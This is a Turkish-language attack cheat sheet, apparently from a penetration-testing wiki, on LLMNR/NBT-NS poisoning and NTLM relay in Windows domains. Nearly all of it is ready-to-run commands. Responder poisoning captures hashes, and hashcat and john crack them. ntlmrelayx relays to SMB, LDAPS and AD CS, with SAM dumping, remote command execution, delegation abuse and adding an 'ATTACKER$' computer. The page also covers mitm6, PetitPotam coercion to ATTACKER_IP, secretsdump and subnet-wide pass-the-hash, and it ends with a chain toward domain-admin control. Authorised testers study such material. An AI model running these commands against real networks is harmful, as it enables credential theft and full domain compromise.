Skip to content

LLMNR/NBT-NS Poisoning & NTLM Relay

ATT&CK T1557.001 difficulty: orta

Windows istemcileri DNS başarısız olunca LLMNR ve NBT-NS (ve bazen mDNS) ile isim çözümlemeye çalışır. Saldırgan bu yayınlara sahte cevap vererek kurbanın NTLM kimlik doğrulamasını kendine yönlendirir; sonuç NetNTLMv2 hash yakalama veya relay ile kimliğe bürünmedir (T1557.001).

- Aynı L2/broadcast segment (veya zehirleme trafiğine erişim)
- Responder + impacket-ntlmrelayx
- Relay için: SMB signing kapalı hedef (veya LDAPS / HTTP / MSSQL vb.)
- Hash kırma için: GPU/wordlist (opsiyonel; relay tercihtir)
Terminal window
sudo responder -I eth0 -wv
Terminal window
sudo responder -I eth0 -wFd
Terminal window
ls /usr/share/responder/logs/

Kurban \yanlisad\share, hatalı UNC veya WPAD isteği yapınca hash düşer. Zorlamak için:

Terminal window

Offline kırma:

Terminal window
hashcat -m 5600 'user::domain:challenge:response...' rockyou.txt -r rules/best64.rule
Terminal window
john --format=netntlmv2 hashes.txt --wordlist=rockyou.txt

Kırmak yerine kimlik doğrulamasını imzalama kapalı (veya LDAP/HTTP) hedefe aktar:

  1. Relay hedefi bul — SMB signing kapalı hostları listele:

    Terminal window
    nxc smb 10.10.10.0/24 --gen-relay-list targets.txt
  2. Responder’ı ayarla — SMB ve HTTP sunucularını kapat ki çakışmasın:

    Terminal window
    # SMB = Off
    # HTTP = Off
    sudo responder -I eth0 -wv
  3. Relay’i başlat — gelen NTLM’i hedefe aktar:

    Terminal window
    sudo ntlmrelayx.py -tf targets.txt -smb2support -i
    Terminal window
    sudo ntlmrelayx.py -t smb://10.10.10.6 -smb2support -c "whoami"
    Terminal window
    sudo ntlmrelayx.py -tf targets.txt -smb2support --dump-sam
    Terminal window
    sudo ntlmrelayx.py -tf targets.txt -smb2support -socks
  4. LDAP / AD CS / delegasyon — machine account veya yüksek yetkili auth gelirse:

    Terminal window
    sudo ntlmrelayx.py -t ldaps://dc01.hedef.local --delegate-access
    Terminal window
    sudo ntlmrelayx.py -t ldaps://dc01.hedef.local --escalate-user lowpriv
    Terminal window
    sudo ntlmrelayx.py -t ldaps://dc01.hedef.local --add-computer ATTACKER$ -smb2support
    Terminal window
    sudo ntlmrelayx.py -t http://ca.hedef.local/certsrv/certfnsh.asp \
    --adcs --template Machine

IPv6 tercih eden Windows istemcilerinde DHCPv6 ile DNS zehirleme + relay:

Terminal window
sudo mitm6 -d hedef.local
Terminal window
sudo ntlmrelayx.py -6 -t ldaps://dc01.hedef.local -wh attacker.hedef.local \
--delegate-access

Detay: MITM.

Terminal window
python3 PetitPotam.py -d hedef.local -u user -p pass ATTACKER_IP DC_IP
Terminal window
proxychains secretsdump.py hedef/admin@10.10.10.6
Terminal window
nxc smb 10.10.10.0/24 -u admin -H <NTLM> --local-auth

NTLM Relay · ntlmrelayx

embedded tool
Generated command
impacket-ntlmrelayx -tf targets.txt -smb2support
nxc --gen-relay-list
→ Responder (SMB/HTTP Off) + ntlmrelayx -socks
→ kullanıcı UNC açar / coercion
→ local admin SAM
→ PtH fleet-wide
mitm6 + ntlmrelayx ldaps --delegate-access
→ machine account RBCD
→ S4U → Domain Admin benzeri etki